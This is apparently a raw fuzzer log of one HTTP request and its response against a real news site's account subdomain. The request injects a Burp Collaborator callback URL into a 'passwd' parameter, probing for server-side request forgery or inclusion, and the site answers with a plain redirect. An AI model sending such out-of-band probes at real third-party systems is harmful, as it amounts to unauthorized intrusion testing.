GET /?passwd=http://hez0kgfv7rvym98k65ggntsp6gcb00.burpcollaborator.net HTTP/1.1
Host: account.thesun.co.uk
User-Agent: Fuzz Faster U Fool v1.2.0-git
Accept-Encoding: gzip


---- ↑ Request ---- Response ↓ ----

HTTP/1.1 302 Found
Content-Length: 43
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-transform
Cf-Cache-Status: DYNAMIC
Cf-Ray: 64142a4fdb43d98c-SIN
Cf-Request-Id: 098078c5e60000d98c92088000000001
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Date: Sat, 17 Apr 2021 08:08:24 GMT
Expect-Ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Location: https://thesun.co.uk/
Ot-Baggage-Auth0-Request-Id: 64142a4fdb43d98c
Ot-Tracer-Sampled: true
Ot-Tracer-Spanid: 50cdf0653782823e
Ot-Tracer-Traceid: 197d7c89780c3ba7
Server: cloudflare
Set-Cookie: __cfduid=dc3b62e26f48be371df57bc3ccbc9f76c1618646904; expires=Mon, 17-May-21 08:08:24 GMT; path=/; domain=.account.thesun.co.uk; HttpOnly; SameSite=Lax; Secure
Strict-Transport-Security: max-age=31536000
Vary: Accept, Accept-Encoding
X-Auth0-Requestid: c49d7cbb380dfdcebe32
X-Content-Type-Options: nosniff

Found. Redirecting to https://thesun.co.uk/